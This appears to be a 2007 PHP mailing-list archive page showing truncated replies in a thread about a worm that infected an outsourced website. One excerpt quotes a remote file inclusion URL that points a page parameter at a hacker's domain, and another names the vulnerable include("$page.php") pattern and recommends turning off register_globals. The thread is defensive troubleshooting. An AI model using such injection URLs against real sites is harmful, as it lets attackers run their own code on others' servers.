[PHP-WIN] Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Richard Lynch
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote:
> Stut wrote:
>> Seak, Teng-Fong wrote:
>>> But after I've spent some time reading the log files, I've finally
>>> found out how the hackers managed to achieve worm infiltration.
>>>
>>> Actually, they're using an URL like this:
>>>

[PHP-WIN] RE: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Jim Moseby
> > Seak, Teng-Fong wrote:
> > No, I don't deserve anything because, as I've written in the
> > original post (but I suppose you didn't notice), the website is
> > outsourced and made by a 3rd company.
Then you should be having this conversation with the 3rd party. They need to validate *EVERY*

Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Seak, Teng-Fong wrote:
> No, I don't deserve anything because, as I've written in the
> original post (but I suppose you didn't notice), the website is
> outsourced and made by a 3rd company.
Well, I've just realised (and checked) that I forgot to mention that my company's website was outsource

[PHP-WIN] Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Dave Goodchild
Turn off register_globals - if you pollute your scripts with global variables like that you are asking for trouble. If you can't, make sure you clean the variable. Using include("$page.php") is asking for trouble. If you can get register_globals switched off (it's off by default in PHP5 for this

Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Stut wrote:
> Seak, Teng-Fong wrote:
>> But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>> Actually, they're using an URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-